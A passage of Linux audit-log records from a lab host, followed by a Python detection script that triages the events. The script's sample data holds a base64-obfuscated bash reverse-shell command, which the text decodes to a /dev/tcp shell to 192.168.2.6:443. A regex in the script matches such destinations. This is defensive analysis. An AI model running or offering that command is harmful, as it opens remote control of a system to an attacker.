path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"dirname /usr/bin/lesspipe\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.11Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.098:84154): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d96b50 a1=556da3d96f30 a2=556da3d96800 a3=556da3d7f010 ppid=17804 pid=17805 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"dircolors\" exe=\"/usr/bin/dircolors\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/dircolors\" inode=4157 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/dircolors\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"dircolors -b\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d96b50 a1=556da3d96f30 a2=556da3d96800 a3=556da3d7f010 ppid=17804 pid=17805 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"dircolors\" exe=\"/usr/bin/dircolors\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/dircolors\" inode=4157 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/dircolors\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"dircolors -b\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.143Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.126:84155): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fff7a940470 a1=1f34830 a2=7fff7a942a58 a3=7ff01b2bff90 ppid=2813 pid=17807 audit_user=unset auid=4294967295 user=nobody uid=65534 group=nogroup gid=65534 effective_user=nobody euid=65534 set_user=nobody suid=65534 filesystem_user=nobody fsuid=65534 effective_group=nogroup egid=65534 set_group=nogroup sgid=65534 filesystem_group=nogroup fsgid=65534 tty=(none) ses=\"-1\" comm=\"microsoft-depen\" exe=\"/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/sbin/man\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/sbin/man\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fff7a940470 a1=1f34830 a2=7fff7a942a58 a3=7ff01b2bff90 ppid=2813 pid=17807 audit_user=unset auid=4294967295 user=nobody uid=65534 group=nogroup gid=65534 effective_user=nobody euid=65534 set_user=nobody suid=65534 filesystem_user=nobody fsuid=65534 effective_group=nogroup egid=65534 set_group=nogroup sgid=65534 filesystem_group=nogroup fsgid=65534 tty=(none) ses=\"-1\" comm=\"microsoft-depen\" exe=\"/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/sbin/man\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/sbin/man\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent redactors= containerid="}
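The UBUNTU5 records above are Azure Monitor Syslog JSON lines whose SyslogMessage field carries an auoms key=value execve record. The following is an added example, not code from the dataset or from the Security Datasets project, showing how a detection engineer would consume that format: it parses the key=value message (cutting out cmdline first, because auoms does not escape the quotes inside it, as the bash -c record shows), rebuilds the pid/ppid chain, decodes the base64 token hidden in the bash -c command line and reports the reverse-shell destination it contains. The sample records are constructed, trimmed copies of the dataset's fields; the pid/ppid and audit id of the first (bash -c) record are assumed, since that record's header is cut off on this page.

```python
"""Triage auoms AUOMS_EXECVE records (Azure Monitor Syslog JSON lines) for the
post-exploitation pattern on UBUNTU5: the tomcat service account spawning a
shell, and a base64-wrapped bash reverse shell. Added example, not part of
the Security Datasets collection."""
import base64
import json
import re
from typing import Dict, List

# Constructed sample input, modelled on the dataset's UBUNTU5 records but trimmed
# to the fields used below. The cmdline values are the ones the dataset contains;
# the pid/ppid and audit id of the first (bash -c) record are assumed.
SAMPLE_LINES = [
    r'''{"Computer":"UBUNTU5","TimeGenerated":"2022-05-11T18:10:22.011Z","EventType":"AUOMS_EXECVE","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.006:84143): syscall=execve success=yes exit=0 ppid=1700 pid=17790 user=tomcat uid=1001 tty=(none) comm=\"bash\" exe=\"/bin/bash\" cwd=\"/\" argc=3 cmdline=\"bash -c \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuNi80NDMgMD4mMQo=}|{base64,-d}|{bash,-i}\"\" redactors= containerid="}''',
    r'''{"Computer":"UBUNTU5","TimeGenerated":"2022-05-11T18:10:22.017Z","EventType":"AUOMS_EXECVE","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.006:84144): syscall=execve success=yes exit=0 ppid=17790 pid=17794 user=tomcat uid=1001 tty=(none) comm=\"bash\" exe=\"/bin/bash\" cwd=\"/\" argc=2 cmdline=\"bash -i\" redactors= containerid="}''',
    r'''{"Computer":"UBUNTU5","TimeGenerated":"2022-05-11T18:10:22.023Z","EventType":"AUOMS_EXECVE","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.006:84145): syscall=execve success=yes exit=0 ppid=17790 pid=17793 user=tomcat uid=1001 tty=(none) comm=\"base64\" exe=\"/usr/bin/base64\" cwd=\"/\" argc=2 cmdline=\"base64 -d\" redactors= containerid="}''',
    r'''{"Computer":"UBUNTU5","TimeGenerated":"2022-05-11T18:10:22.143Z","EventType":"AUOMS_EXECVE","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.126:84155): syscall=execve success=no exit=-2 ppid=2813 pid=17807 user=nobody uid=65534 tty=(none) comm=\"microsoft-depen\" exe=\"/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent\" cwd=\"/\" name=\"/sbin/man\" proctitle=/opt/microsoft/dependency-agent/bin/microsoft-dependency-agent redactors= containerid="}''',
]

# auoms writes cmdline="..." without escaping quotes inside it (see the bash -c
# record), so cmdline is cut out on its "redactors=" terminator before the rest
# of the message is tokenised as key=value pairs.
_CMDLINE_RE = re.compile(r' cmdline="(.*)" redactors=')
_KV_RE = re.compile(r'(\w+)=("[^"]*"|\[[^\]]*\]|\S+)')
_B64_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')
_REVSHELL_RE = re.compile(r'/dev/(tcp|udp)/([\w.-]+)/(\d+)')

SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/bash"}
SERVICE_ACCOUNTS = {"tomcat", "www-data"}  # accounts that should never get a shell


def parse_auoms(msg: str) -> Dict[str, str]:
    """Turn one auoms key=value message into a dict of string fields."""
    fields: Dict[str, str] = {}
    m = _CMDLINE_RE.search(msg)
    if m:
        fields["cmdline"] = m.group(1)
        msg = msg[: m.start()]
    for key, val in _KV_RE.findall(msg):
        fields[key] = val.strip('"')
    return fields


def parse_line(line: str) -> Dict[str, str]:
    """Parse one Azure Monitor Syslog JSON line into auoms fields plus host/time."""
    rec = json.loads(line)
    fields = parse_auoms(rec["SyslogMessage"])
    fields["host"] = rec["Computer"]
    fields["time"] = rec["TimeGenerated"]
    fields["event_type"] = rec.get("EventType", "")
    return fields


def decode_b64_tokens(cmdline: str) -> List[str]:
    """Return printable text hidden in base64-looking tokens of a command line."""
    out = []
    for tok in _B64_RE.findall(cmdline):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8").strip()
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return out


def ancestry(proc: Dict[str, str], procs: Dict[str, Dict[str, str]]) -> str:
    """Walk pid -> ppid through the successful execve records seen so far."""
    chain, seen = [], set()
    cur = proc
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(f'{cur["pid"]}:{cur.get("comm", "?")}')
        cur = procs.get(cur.get("ppid", ""))
    return " <- ".join(chain)


def triage(lines: List[str]) -> List[Dict[str, str]]:
    """Flag service-account shells and base64-hidden reverse shells."""
    events = [f for f in map(parse_line, lines) if f["event_type"] == "AUOMS_EXECVE"]
    procs = {f["pid"]: f for f in events if f.get("success") == "yes"}
    findings = []
    for f in events:
        if f.get("success") != "yes":  # a failed execve never ran anything
            continue
        if f.get("user") in SERVICE_ACCOUNTS and f.get("exe") in SHELLS:
            findings.append({"rule": "service_account_shell", "pid": f["pid"],
                             "user": f["user"], "cmdline": f.get("cmdline", ""),
                             "chain": ancestry(f, procs)})
        for decoded in decode_b64_tokens(f.get("cmdline", "")):
            m = _REVSHELL_RE.search(decoded)
            if m:
                findings.append({"rule": "b64_reverse_shell", "pid": f["pid"],
                                 "decoded": decoded, "proto": m.group(1),
                                 "c2": f"{m.group(2)}:{m.group(3)}"})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES):
        print(json.dumps(finding))
```

Run directly, it prints one JSON finding per line. On the sample it flags the tomcat account spawning /bin/bash twice (pid 17790 and its child 17794, the `bash -i` from the record above) and decodes the `{echo,...}|{base64,-d}|{bash,-i}` payload to `bash -i >& /dev/tcp/192.168.2.6/443 0>&1`, a bash reverse shell to 192.168.2.6:443, which also answers the question of where the attacking machine sits on the network. The failed execve by the dependency agent (success=no, user nobody) is parsed but not flagged. Against the full dataset, feed the file's JSON lines to `triage` unchanged; the EventData field duplicates SyslogMessage, so parsing one of them is enough.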